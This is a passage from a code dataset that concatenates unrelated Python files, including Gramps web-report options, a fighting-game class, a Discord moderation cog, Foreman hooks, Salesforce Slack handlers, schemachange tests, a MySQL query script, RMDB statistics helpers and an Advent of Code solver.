self.__svg_tree_dup_changed)\n\t\taddopt(\"svg_tree_dup\", self.__svg_tree_dup)\n\t\t\n\t\tself.__svg_tree_color_dup = ColorOption(_(\"Color for duplicates\"), \"#888A85\")\n\t\taddopt(\"svg_tree_color_dup\", self.__svg_tree_color_dup)\n\n\n\tdef __add_pages_options(self, menu):\n\t\tcategory_name = _(\"Pages\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\theadernote = NoteOption(_('HTML user header'))\n\t\theadernote.set_help( _(\"A note to be used as the page header\"))\n\t\taddopt(\"headernote\", headernote)\n\n\t\tfooternote = NoteOption(_('HTML user footer'))\n\t\tfooternote.set_help( _(\"A note to be used as the page footer\"))\n\t\taddopt(\"footernote\", footernote)\n\n\t\tpage_defs = [\n\t\t\tPAGE_PERSON,\n\t\t\tPAGE_SURNAMES,\n\t\t\tPAGE_PERSON_INDEX,\n\t\t\tPAGE_FAMILY_INDEX,\n\t\t\tPAGE_SOURCE_INDEX,\n\t\t\tPAGE_MEDIA_INDEX,\n\t\t\tPAGE_PLACE_INDEX,\n\t\t\tPAGE_ADDRESS_INDEX,\n\t\t\tPAGE_REPOSITORY_INDEX,\n\t\t]\n\t\tfor page_def in page_defs:\n\t\t\tname = PAGES_NAMES[page_def][0]\n\t\t\ttitle = PAGES_NAMES[page_def][1]\n\t\t\tpage_name = StringOption(_(\"Title for the page \\\"%(name)s\\\"\") % {\"name\": name}, title)\n\t\t\tpage_name.set_help(_(\"Name for the page \\\"%(name)s\\\"\") % {\"name\": name})\n\t\t\taddopt(\"page_name_%i\" % page_def, page_name)\n\n\n\tdef __add_custom_pages_options(self, menu):\n\t\tcategory_name = _(\"Custom pages\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tfor i in range(NB_CUSTOM_PAGES):\n\t\t\tpage_def = PAGE_CUSTOM + i\n\t\t\tpage_name = StringOption(_(\"Title for the custom page %(index)i\") % {\"index\": i + 1}, _(\"Custom page %(index)i\") % {\"index\": i + 1})\n\t\t\tpage_name.set_help(_(\"Name for the custom page %(index)i\") % {\"index\": i + 1})\n\t\t\taddopt(\"page_name_%i\" % page_def, page_name)\n\n\t\t\tcustom_note = NoteOption(_(\"Note for custom page %(index)i\") % {\"index\": i + 1})\n\t\t\tcustom_note.set_help(_(\"A note to be used for the custom page content.\\n\") + self.note_help)\n\t\t\taddopt(\"custom_note_%i\" % i, custom_note)\n\n\t\t\tcustom_menu = BooleanOption(_(\"Menu for the custom page %(index)i\") % {\"index\": i + 1}, True)\n\t\t\tcustom_menu.set_help(_(\"Whether to print a menu for the custom page\"))\n\t\t\taddopt(\"custom_menu_%i\" % i, custom_menu)\n\n\n\tdef __add_select_pages_options(self, menu):\n\t\tcategory_name = _(\"Pages selection\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tself.__pages_number = NumberOption(_(\"Number of pages\"), 11, 1, NB_TOTAL_PAGES_MAX)\n\t\tself.__pages_number.set_help(_(\"Number pages in the web site.\"))\n\t\taddopt(\"pages_number\", self.__pages_number)\n\t\tself.__pages_number.connect(\"value-changed\", self.__pages_contents_changed)\n\n\t\tpage_defs = [\n\t\t\tPAGE_CUSTOM,\n\t\t\tPAGE_SURNAMES,\n\t\t\tPAGE_PERSON,\n\t\t\tPAGE_PERSON_INDEX,\n\t\t\tPAGE_FAMILY_INDEX,\n\t\t\tPAGE_SOURCE_INDEX,\n\t\t\tPAGE_MEDIA_INDEX,\n\t\t\tPAGE_PLACE_INDEX,\n\t\t\tPAGE_ADDRESS_INDEX,\n\t\t\tPAGE_REPOSITORY_INDEX,\n\t\t\tPAGE_SVG_TREE,\n\t\t] + [PAGE_CUSTOM + i for i in range (1, NB_CUSTOM_PAGES)\n\t\t] + [PAGE_CUSTOM] * NB_TOTAL_PAGES_MAX\n\n\t\tself.__page_content = []\n\t\tfor i in range(NB_TOTAL_PAGES_MAX):\n\t\t\tpage_def = page_defs[i]\n\t\t\tpage_content = EnumeratedListOption(_(\"Contents of page %(index)i\") % {\"index\": i + 1}, page_def)\n\t\t\tfor (j, pname) in enumerate(PAGES_NAMES):\n\t\t\t\tpage_content.add_item(j, pname[0])\n\t\t\tpage_content.set_help(_(\"Contents of the page\"))\n\t\t\taddopt(\"page_content_%i\" % i, 
page_content)\n\t\t\tself.__page_content.append(page_content)\n\t\t\tself.__page_content[i].connect(\"value-changed\", self.__pages_contents_changed)\n\n\t\tself.__pages_contents_changed()\n\n\n\tdef __archive_changed(self):\n\t\t\"\"\"\n\t\tDisable the archive file when archive is disabled \n\t\t\"\"\"\n\t\tenable = self.__archive.get_value()\n\t\tself.__archive_file.set_available(enable)\n\n\tdef __pid_changed(self):\n\t\t\"\"\"\n\t\tUpdate the filter list based on the selected person\n\t\t\"\"\"\n\t\tgid = self.__pid.get_value()\n\t\tperson = self.__db.get_person_from_gramps_id(gid)\n\t\tfilter_list = report_utils.get_person_filters(person, False)\n\t\tself.__filter.set_filters(filter_list)\n\n\tdef __filter_changed(self):\n\t\t\"\"\"\n\t\tHandle filter change. If the filter is not specific to a person,\n\t\tdisable the person option\n\t\t\"\"\"\n\t\tfilter_value = self.__filter.get_value()\n\t\tif filter_value in [1, 2, 3, 4]:\n\t\t\t# Filters 1, 2, 3 and 4 rely on the center person\n\t\t\tself.__pid.set_available(True)\n\t\telse:\n\t\t\t# The rest don't\n\t\t\tself.__pid.set_available(False)\n\n\tdef __living_changed(self):\n\t\t\"\"\"\n\t\tHandle a change in the living option\n\t\t\"\"\"\n\t\tif self.__living.get_value() == INCLUDE_LIVING_VALUE:\n\t\t\tself.__yearsafterdeath.set_available(False)\n\t\telse:\n\t\t\tself.__yearsafterdeath.set_available(True)\n\n\tdef __pages_contents_changed(self):\n\t\tnb = self.__pages_number.get_value()\n\t\tfor i in range(NB_TOTAL_PAGES_MAX):\n\t\t\tif (i < nb):\n\t\t\t\tself.__page_content[i].set_available(True)\n\t\t\telse:\n\t\t\t\tself.__page_content[i].set_available(False)\n\n\tdef __placemap_options_changed(self):\n\t\t\"\"\"\n\t\tHandles the changing nature of the place map Options\n\t\t\"\"\"\n\t\t# get values for all Place Map Options tab...\n\t\tplace_active = self.__inc_places.get_value()\n\t\tplace_map_active = self.__placemappages.get_value()\n\t\tfamily_active = self.__familymappages.get_value()\n\t\tmapservice_opts = self.__mapservice.get_value()\n\t\t# google_opts = self.__googleopts.get_value()\n\n\t\tif (place_active):\n\t\t\tself.__placemappages.set_available(True)\n\t\t\tself.__familymappages.set_available(True)\n\t\t\tself.__mapservice.set_available(True)\n\t\t\t# self.__googleopts.set_available(True)\n\n\t\tif (place_map_active or family_active):\n\t\t\tself.__mapservice.set_available(True)\n\t\telse:\n\t\t\tself.__mapservice.set_available(False)\n\n\t\t# if (family_active and mapservice_opts == \"Google\"):\n\t\t\t# self.__googleopts.set_available(True)\n\t\t# else:\n\t\t\t# self.__googleopts.set_available(False)\n\n\t\tif (not place_active):\n\t\t\tself.__placemappages.set_available(False)\n\t\t\tself.__familymappages.set_available(False)\n\t\t\tself.__mapservice.set_available(False)\n\t\t\t# self.__googleopts.set_available(False)\n\n\tdef __svg_tree_dup_changed(self):\n\t\t\"\"\"\n\t\tHandles the duplicate color enable\n\t\t\"\"\"\n\t\tenable = self.__svg_tree_dup.get_value()\n\t\tself.__svg_tree_color_dup.set_available(enable)\n","repo_name":"daleathan/gramps-addons-code-svn","sub_path":"contrib/DynamicWeb/dynamicweb.py","file_name":"dynamicweb.py","file_ext":"py","file_size_in_byte":148390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2127931495","text":"from person import Person\nfrom fight import Fight\n\nclass Fighter(Person):\n\n def __init__(self, name: str, age: int = 0, wealth: int = 0, skills: dict = None) -> None:\n \"\"\"\n Constructor for the 
Fighter class.\n\n        :type skills: object\n        :param name: str\n        :param age: int\n        :param wealth: int\n        \"\"\"\n\n        Person.__init__(self, name, age, wealth)\n        self.__skills = None\n        self.challenged = []\n\n        if age < 18:\n            print(name + \" cannot be a fighter.\")\n            return\n\n        self.__skills = {\"spear\": 0,\n                         \"unarmed_combat\": 0,\n                         \"mace\": 0,\n                         \"broadsword\": 0}\n\n        if skills:\n            self.__skills = skills\n            if self.__skills[\"spear\"] > 10 or self.__skills[\"spear\"] < 0:\n                print(\"The skill level for spear is invalid.\")\n\n            if self.__skills[\"unarmed_combat\"] > 10 or self.__skills[\"unarmed_combat\"] < 0:\n                print(\"The skill level for unarmed_combat is invalid.\")\n\n            if self.__skills[\"mace\"] > 10 or self.__skills[\"mace\"] < 0:\n                print(\"The skill level for mace is invalid.\")\n\n            if self.__skills[\"broadsword\"] > 10 or self.__skills[\"broadsword\"] < 0:\n                print(\"The skill level for broadsword is invalid.\")\n\n        self.level = 2\n\n\n    @property\n    def getSkills(self) -> dict:\n        \"\"\"\n        Returns the skills of the fighter.\n\n        :return: __skills: dict\n        \"\"\"\n        if self.age >= 18:\n            return self.__skills\n\n        else:\n            return {}\n\n    def setSkills(self, newSkills: dict) -> None:\n        \"\"\"\n        Sets the skills to these new skills\n\n        :param newSkills: dict\n        :return: None\n        \"\"\"\n\n        self.__skills = newSkills\n\n    def challenge(self, fighter2: object, skill: str) -> None:\n        \"\"\"\n        Challenges another fighter.\n\n        :param fighter2: object\n        :param skill: str\n        :return: None\n        \"\"\"\n        # A fighter cannot fight themselves\n\n        if not self.isEqual(fighter2):\n\n            if not self.getSkills and not isinstance(fighter2, Fighter):\n                print(self.getName + \" and \" + fighter2.getName + \" both are not fighters and hence cannot fight.\")\n\n            elif not self.getSkills:\n                print(self.getName + \" is not a fighter.\")\n                return\n\n            elif not isinstance(fighter2, Fighter):\n                print(fighter2.getName + \" is not a fighter.\")\n                return\n\n            elif not fighter2.getSkills:\n                print(fighter2.getName + \" is not a fighter.\")\n                return\n\n            # If they are both fighters:\n\n            elif self.getSkills and fighter2.getSkills:\n\n                # If the wealth of both the fighters is more than 0\n\n                if self.getWealth <= 0:\n                    print(self.getName + \" has no wealth to fight.\")\n                    return None\n\n                if fighter2.getWealth <= 0:\n                    print(fighter2.getName + \" has no wealth to fight.\")\n                    return None\n\n                # If the skill they are fighting with does not exist\n\n                if skill not in self.getSkills or skill not in fighter2.getSkills:\n                    print(skill + \" is not a valid skill for the fighter\")\n                    return None\n\n                # If the skill they are using is over 0 then they fight.\n\n                duel = Fight(self, fighter2, skill)\n                winner = duel.winner()\n\n        else:\n            print(\"A fighter cannot fight themselves!\")\n            return None\n\n    def withdraw(self, withdrawFighter: 'Fighter') -> None:\n        \"\"\"\n        Withdraws the fighter's name from the list\n\n        :param withdrawFighter: Fighter\n        :return: None\n        \"\"\"\n        if self.getSkills and withdrawFighter.getSkills:\n\n            pos = -1\n\n            for x in range(0, len(self.challenged)):\n                if withdrawFighter == self.challenged[x].getFighter1 or withdrawFighter == self.challenged[x].getFighter2:\n                    pos = x\n                else:\n                    pass\n\n            if pos > -1:\n                self.challenged.pop(pos)\n\n            else:\n                print(self.getName + \" has not challenged \" + withdrawFighter.getName)\n\n        else:\n            print(self.getName + \" does not have any challenges since it is not a fighter.\")\n\n    def __str__(self) -> str:\n        \"\"\"\n        Returns the state of the Fighter.\n\n        :return: str\n        \"\"\"\n        if self.getSkills:\n            return Person.__str__(self) + \" \" + 
self.getName + \"'s skills are: \\n\\tSpear: \" + str(\n                self.getSkills[\"spear\"]) \\\n                + \"\\n\\tUnarmed Combat: \" + str(self.getSkills[\"unarmed_combat\"]) + \"\\n\\tMace: \" + str(\n                self.getSkills[\"mace\"]) \\\n                + \"\\n\\tBroadsword: \" + str(self.getSkills[\"broadsword\"])\n\n        else:\n            return Person.__str__(self)\n","repo_name":"Avik9/Battle-Time","sub_path":"fighter.py","file_name":"fighter.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"20581016909","text":"import asyncio\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\n\r\n\r\n\r\nclass admin(commands.Cog):\r\n\r\n    def __init__(self, client):\r\n        self.client = client\r\n\r\n\r\n    @commands.command()\r\n    @commands.has_permissions(ban_members=True)\r\n    async def kick(self, ctx, member: discord.Member, *, reason=None):\r\n        await ctx.message.delete(delay=0)\r\n        await member.send(f\"You were kicked from the server\")\r\n        await ctx.send(f\"Member {member.mention} was kicked from this server!\")\r\n        await member.kick(reason=reason)\r\n\r\n    @commands.command()\r\n    @commands.has_permissions(ban_members=True)\r\n    async def ban(self, ctx, member: discord.Member, *, reason=None):\r\n        await ctx.send(f\"Member {member.mention} was banned on this server\")\r\n        await member.ban(reason=reason)\r\n        await ctx.message.delete(delay=0)\r\n\r\n    @commands.command()\r\n    @commands.has_permissions(ban_members=True)\r\n    async def unban(self, ctx, user_id: int):\r\n        user = await self.client.fetch_user(user_id)\r\n        await ctx.guild.unban(user)\r\n        await ctx.message.delete(delay=0)\r\n\r\n    @commands.command()\r\n    @commands.has_permissions(ban_members=True)\r\n    async def ping(self, ctx):\r\n        await ctx.send(\"pong!\")\r\n\r\n\r\n\r\n\r\nasync def setup(client):\r\n    await client.add_cog(admin(client))","repo_name":"nkplka/discord","sub_path":"cogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"12073523384","text":"#!/usr/bin/env python\n#######\n# To allow this module to be imported by other triggers\n# execute the commands below:\n# $ mkdir -p /usr/share/foreman-community/hooks\n# $ touch /usr/share/foreman-community/hooks/__init__.py\n# $ cp functions.py /usr/share/foreman-community/hooks/\n########\nimport json\nimport sys\nimport tempfile\n\nHOOK_TEMP_DIR = \"/usr/share/foreman/tmp\"\n\n# HOOK_EVENT = update, create, before_destroy etc.\n# HOOK_OBJECT = to_s representation of the object, e.g. 
host's fqdn\nHOOK_EVENT, HOOK_OBJECT = (sys.argv[1], sys.argv[2])\n\n\ndef get_json_hook():\n '''\n Create JSON object to be imported by hook/trigger\n Saves the data received via stdin to file.\n It does not require to save to a file, but it may be useful\n to troubleshooting.\n '''\n\n with tempfile.NamedTemporaryFile(\n dir=HOOK_TEMP_DIR,\n # set to False for troubleshooting\n delete=True,\n prefix=\"foreman_hooks.\") as hook:\n\n json_hook = sys.stdin.read()\n hook.file.write(json_hook)\n hook.file.flush()\n return json.loads(json_hook)\n","repo_name":"theforeman/foreman_hooks","sub_path":"examples/python/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"67"} +{"seq_id":"40283674361","text":"from itertools import islice\nfrom types import SimpleNamespace\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\nimport pickle\n\nclass Measurement:\n def __init__(self, params):\n self.params = params\n self.x = []\n self.w = []\n self.v = []\n self.noise = []\n self.LQG = []\n\n if params.scheme in ['noisy_lloyd_max', 'separate']:\n # Quantization index translated into bits\n self.bits = []\n # Entire history believed by the decoder (at each step)\n self.decoded_bits_history = []\n self.correctly_decoded = []\n\n def record(self, sim):\n self.x.append(sim.plant.x)\n self.w.append(sim.plant.w)\n self.v.append(sim.plant.v)\n self.noise.append(sim.channel.last_noise)\n self.LQG.append(sim.LQG.evaluate(sim.t))\n self.channel_average_power = sim.channel.average_power()\n\n if hasattr(self, 'bits'):\n self.bits = sim.encoder.get_bits_history()\n self.decoded_bits_history.append(list(\n sim.decoder.stack_decoder.first_nodes[-1].input_history()))\n self.correctly_decoded.append(\n all((word == history_word).all()\n for word, history_word in \\\n zip(self.bits, self.decoded_bits_history[-1])))\n print(\"Correctly decoded: {}\".format(self.correctly_decoded[-1]))\n\n def save(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump(self, f)\n\n @staticmethod\n def load(filename):\n with open(filename, 'rb') as f:\n measurement = pickle.load(f)\n assert isinstance(measurement, Measurement)\n return measurement\n\n @staticmethod\n def average(measurements):\n new = Measurement(measurements[0].params)\n\n def average_sequence(sequences):\n sequences = [np.array(sequence).flatten() for sequence in sequences]\n slices = list(zip(*sequences))\n return np.array(list(map(np.mean, slices)))\n\n new.x = average_sequence(m.x for m in measurements)\n new.w = average_sequence(m.w for m in measurements)\n new.v = average_sequence(m.v for m in measurements)\n new.noise = average_sequence(m.noise for m in measurements)\n new.LQG = average_sequence(m.LQG for m in measurements)\n\n return new\n\n def get_noise_record(self):\n noise = SimpleNamespace()\n\n noise.x1 = self.x[0]\n noise.w_sequence = self.w[:]\n noise.v_sequence = self.v[:]\n noise.n_sequence = list(np.array(self.noise).flatten())\n\n return noise\n\n\n def plot(self, label=None):\n self.plot_setup()\n self.plot_LQG(label=label)\n self.plot_bounds()\n if hasattr(self, 'correctly_decoded'):\n self.plot_correctly_decoded()\n plt.legend()\n\n def plot_setup(self, label=\"Time [steps]\"):\n plt.xlabel(label)\n plt.grid()\n\n def plot_x(self):\n plt.plot(list(range(len(self.x))), self.x)\n plt.ylabel(\"Plant state\")\n\n def plot_LQG(self, label=None, *args, **kwargs):\n 
plt.plot(list(range(len(self.LQG))), 10 * np.log10(self.LQG),\n label=label, *args, **kwargs)\n plt.ylabel(r\"$\\bar{J}_t$ [dB]\")\n\n def plot_bounds(self, lower_label=\"Theoretical average lower bound\",\n upper_label=\"Theoretical prediction\",\n lower_args=['--'], lower_kwargs={},\n upper_args=['--'], upper_kwargs={}):\n params = self.params\n\n # Upper bound\n if params.analog and hasattr(params, 'SDR0'):\n plt.plot((1, len(self.LQG)),\n 10 * np.log10(params.LQR_inf_upper_bound()) * np.ones(2),\n *upper_args, label=upper_label, **upper_kwargs)\n\n # Lower bound\n if params.analog:\n plt.plot((1, len(self.LQG)),\n 10 * np.log10(params.LQR_inf_lower_bound()) * np.ones(2),\n *lower_args, label=lower_label, **lower_kwargs)\n\n def plot_correctly_decoded(self, y=0):\n RECTANGLE_HEIGHT = 0.8\n\n # Find intervals of consecutive Trues\n intervals = []\n start = None\n for (t, good) in enumerate(self.correctly_decoded, 1):\n if not start and not good:\n start = t\n elif start and (good or t == len(self.correctly_decoded)):\n intervals.append((start, t))\n start = None\n\n for i, (start, stop) in enumerate(intervals):\n print(\"({}, {})\".format(start, stop))\n plt.gca().add_patch(\n patches.Rectangle(\n (start, y - RECTANGLE_HEIGHT/2),\n stop - start,\n RECTANGLE_HEIGHT,\n label=\"Decoding errors\" if i == 0 else None,\n color='purple'\n )\n )\n","repo_name":"eliasrg/SURF2017","sub_path":"code/measurements.py","file_name":"measurements.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"72229322132","text":"from slack_ttt.base_logic_source import BaseLogicSource\nfrom slack_ttt.response_message import ResponseMessageBuilder as RMB\nfrom simple_salesforce import Salesforce\nfrom settings import (\n SFDC_USERNAME,\n SFDC_PASSWORD,\n SFDC_TOKEN\n )\n\nclass SalesforceLogicSource(BaseLogicSource):\n\n def initialize(self, params):\n self.sfdc = Salesforce(username=SFDC_USERNAME,\n password=SFDC_PASSWORD,\n security_token=SFDC_TOKEN)\n\n self.channel_id = params['channel_id'][0]\n self.requester = '@' + params['user_name'][0]\n self.command = None\n if 'text' in params:\n self.command = params['text'][0]\n\n def __sfdc_rest_call(self, resource):\n return self.sfdc.apexecute('handleTTTCommand',\n method='POST',\n data={'resource': resource,\n 'channelId': self.channel_id,\n 'requestor':self.requester,\n 'command': self.command\n })\n\n def __generate_response(self, response_map):\n print('*** RESPONSE: ',response_map);\n game_response_type = response_map['game_response_type']\n values = response_map['values'].split(',')\n slack_response_type = None\n if \"slack_response_type\" in response_map:\n slack_response_type = response_map[\"slack_response_type\"]\n else:\n slack_response_type = 'Ephemeral'\n\n response = None\n if 'response' in response_map:\n response = response_map['response']\n\n return RMB.respond(None,\n game_response_type=game_response_type,\n values=values,\n slack_response_type=slack_response_type,\n response=response)\n\n\n\n def new_game(self):\n response = self.__sfdc_rest_call('/ttt')\n return self.__generate_response(response['body'])\n\n\n def game_help(self):\n super().game_help()\n \"\"\"Help handler which provides information about the game and how to play it.\n\n :return:\n \"\"\"\n return RMB.respond(None,\n game_response_type='help_text',\n values=[])\n\n def accept_game(self):\n response = self.__sfdc_rest_call('/ttt-accept')\n return 
self.__generate_response(response['body'])\n\n    def decline_game(self):\n        response = self.__sfdc_rest_call('/ttt-decline')\n        return self.__generate_response(response['body'])\n\n    def display_board(self):\n        response = self.__sfdc_rest_call('/ttt-board')\n        return self.__generate_response(response['body'])\n\n    def play_move(self):\n        response = self.__sfdc_rest_call('/ttt-move')\n        return self.__generate_response(response['body'])\n\n    def end_game(self):\n        response = self.__sfdc_rest_call('/ttt-end')\n        return self.__generate_response(response['body'])","repo_name":"dineshrajpurohit/slack_ttt","sub_path":"slack_ttt/salesforce/salesforce_logic.py","file_name":"salesforce_logic.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"8812218353","text":"import json\nimport os\n\nimport pytest\nfrom jinja2 import DictLoader\nfrom schemachange.cli import JinjaTemplateProcessor\n\n\ndef test_from_environ_not_set():\n    processor = JinjaTemplateProcessor(\"\", None)\n\n    # override the default loader\n    templates = {\"test.sql\": \"some text {{ env_var('MYVAR') }}\"}\n    processor.override_loader(DictLoader(templates))\n\n    with pytest.raises(ValueError) as e:\n        context = processor.render(\"test.sql\", None, True)\n\n    assert str(e.value) == \"Could not find environmental variable MYVAR and no default value was provided\"\n\n\ndef test_from_environ_set():\n    processor = JinjaTemplateProcessor(\"\", None)\n\n    # set MYVAR env variable\n    os.environ[\"MYVAR\"] = \"myvar_from_environment\"\n\n    # override the default loader\n    templates = {\"test.sql\": \"some text {{ env_var('MYVAR') }}\"}\n    processor.override_loader(DictLoader(templates))\n\n    context = processor.render(\"test.sql\", None, True)\n\n    # unset MYVAR env variable\n    del os.environ[\"MYVAR\"]\n\n    assert context == \"some text myvar_from_environment\"\n\n\ndef test_from_environ_not_set_default():\n    processor = JinjaTemplateProcessor(\"\", None)\n\n    # override the default loader\n    templates = {\"test.sql\": \"some text {{ env_var('MYVAR', 'myvar_default') }}\"}\n    processor.override_loader(DictLoader(templates))\n\n    context = processor.render(\"test.sql\", None, True)\n\n    assert context == \"some text myvar_default\"\n","repo_name":"Snowflake-Labs/schemachange","sub_path":"tests/test_jinja_env_var_template.py","file_name":"test_jinja_env_var_template.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"67"}
+{"seq_id":"13679918612","text":"#!/usr/bin/python3\n'''Modules to be imported'''\nimport MySQLdb\nimport sys\n\n\ndef main(args):\n    '''main function'''\n\n    # check if passed args are as needed\n    if (len(args) != 5):\n        print(\"check number of args\")\n        sys.exit(1)\n\n    # create a database connection\n    db_connection = MySQLdb.connect(host=\"localhost\",\n                                    port=3306,\n                                    user=args[1],\n                                    passwd=args[2],\n                                    db=args[3])\n\n    # create a cursor\n    cur = db_connection.cursor()\n\n    # sql query\n    query = \"SELECT cities.name FROM cities JOIN states ON\\\n cities.state_id = states.id WHERE states.name = '{}' ORDER BY cities.id ASC\"\n\n    formatted = query.format(args[4])\n\n    # execute the query\n    cur.execute(formatted)\n\n    # loop to display results\n    print(\", \".join(row[0] for row in cur.fetchall()))\n\n    # close connections\n    cur.close()\n    db_connection.close()\n\n\n# Hey, I won't run when I'm imported\nif __name__ == \"__main__\":\n    main(sys.argv)\n","repo_name":"LionMara/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"15280369221","text":"import textwrap\nfrom django.db.models import Max\n\nfrom src.models import *\n\n\ndef parse_history():\n    hist_list = []\n    hist = HistoryItem.objects.all()\n    for h in hist:\n        lines = h.content\n        lines = [line for line in lines.split('\\n') if line.strip()]\n        ls_1_flag = 0\n        ls_2_flag = 0\n        for i in xrange(len(lines)):\n            lines[i] = lines[i].rstrip()\n            if lines[i][0] == \"#\":\n                lines[i] = \"\" + lines[i][1:] + \"\\n    \"\n            elif lines[i][0] != '-':\n                if lines[i][0] == \"!\":\n                    lines[i] = \"by \" + lines[i][1:] + \"\\n\\n    \"\n                else:\n                    lines[i] = \"\\n\\n    \" + lines[i] + \"\\n\\n      \"\n\n            else:\n                if lines[i][:2] != '-\\\\':\n                    lines[i] = \"\\n    • \" + lines[i][1:] + \"\\n    • \"\n                    if ls_1_flag:\n                        lines[i] = \"\\n\\n    \" + lines[i]\n                    ls_1_flag = i\n\n                else:\n                    lines[i] = \"\\n  • \" + lines[i][2:] + \"\\n  • \"\n                    if ls_2_flag < ls_1_flag:\n                        lines[i] = \"\\n\\n      \" + lines[i]\n                    ls_2_flag = i\n        lines.append(\"\\n\\n\\n\\n    \")\n        date_string = h.date.strftime(\"%b %d, %Y (%a)\")\n        lines.insert(0, \"%s\\n    \" % date_string)\n        hist_list.insert(0, ''.join(lines))\n\n    return hist_list\n\n\ndef get_rmdb_stats():\n    rmdb_ids = [d.values()[0] for d in RMDBEntry.objects.values('rmdb_id').distinct()]\n    N_all = 0\n    N_RNA = 0\n    # N_RNA = ConstructSection.objects.values('name').distinct().count()\n    N_puzzle = 0\n    N_eterna = 0\n    N_constructs = 0\n    N_datapoints = 0\n    for rmdb_id in rmdb_ids:\n        entries = RMDBEntry.objects.filter(rmdb_id=rmdb_id).order_by('-version')\n        if len(entries) > 0:\n            N_all += 1\n            N_RNA += len(entries)\n\n            if 'RNAPZ' in rmdb_id:\n                N_puzzle += 1\n            if 'ETERNA' in rmdb_id:\n                N_eterna += 1\n            e = entries[0]\n            N_datapoints += e.data_count\n            N_constructs += e.construct_count\n    return {'N_all': N_all, 'N_RNA': N_RNA, 'N_puzzle': N_puzzle, 'N_eterna': N_eterna, 'N_constructs': N_constructs, 'N_datapoints': N_datapoints}\n\n\ndef browse_json_list(names_d):\n    constructs = []\n    for c in names_d:\n        entries = RMDBEntry.objects.filter(constructsection__name=c['name']).filter(status='PUB').order_by('rmdb_id', '-version')\n        entry_ids = []\n        (SS_entries, TT_entries, MA_entries, MM_entries, MR_entries) = ([], [], [], [], [])\n\n        for e in entries:\n            if e.rmdb_id not in entry_ids:\n                entry_ids.append(e.rmdb_id)\n                comment = e.comments.split()\n                for i, m in enumerate(comment):\n                    if len(m) > 40:\n                        comment[i] = ' '.join(textwrap.wrap(m, 40))\n                entry = {'rmdb_id': e.rmdb_id, 'version': e.version, 'construct_count': e.construct_count, 'data_count': e.data_count, 'authors': e.authors, 'comments': ' '.join(comment), 'title': e.publication.title, 'latest': e.supercede_by}\n                if e.type == \"SS\" or e.type == \"DC\":\n                    SS_entries.append(entry)\n                elif e.type == \"TT\":\n                    TT_entries.append(entry)\n                elif e.type == \"MM\":\n                    MM_entries.append(entry)\n                elif e.type == \"MR\":\n                    MR_entries.append(entry)\n                elif e.type == \"MA\":\n                    MA_entries.append(entry)\n\n        constructs.append({'name': c['name'], 'SS_entry': SS_entries, 'TT_entry': TT_entries, 'MM_entry': MM_entries, 'MA_entry': MA_entries, 'MR_entry': MR_entries})\n    return constructs\n\n\ndef get_rmdb_category(flag):\n    latest_versions = RMDBEntry.objects.values('rmdb_id').annotate(latest_version=Max('version'))\n    q_statement = Q()\n    for pair in latest_versions:\n        q_statement |= (Q(entry__rmdb_id=pair['rmdb_id']) & Q(entry__version=pair['latest_version']))\n\n    LatestConstructSec = ConstructSection.objects.filter(q_statement)\n\n    if flag == \"puzzle\":\n        names_d = LatestConstructSec.filter(name__icontains='Puzzle').values('name').distinct()\n    elif flag == \"eterna\":\n        names_d = LatestConstructSec.filter(name__icontains='EteRNA').values('name').distinct()\n    else:\n        names_d = LatestConstructSec.exclude(name__icontains='EteRNA').exclude(name__icontains='Puzzle').values('name').distinct()\n    names_d = names_d.order_by('name')\n    return browse_json_list(names_d)\n\n","repo_name":"DasLab/Server_RMDB","sub_path":"src/util/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"}
+{"seq_id":"42010684078","text":"def check_cycle(cycle, x):\n    if (cycle-20) % 40 == 0:\n        return cycle * x\n\n    return 0\n\ndef check_x(cycle, x):\n    c = (cycle - 1) % 40\n\n    if x-1 <= c <= x+1:\n        return True \n    \n    return False\n\n\ndef count_signal_strength(lines):\n    x = 1\n    cycle = 0\n    signal_strength_sum = 0\n    letters = \"\"\n\n    for line in lines:\n\n        if line[0:4] == \"noop\":\n            cycle += 1\n            signal_strength_sum += check_cycle(cycle, x)\n            if check_x(cycle, x):\n                letters += \"#\"\n            else:\n                
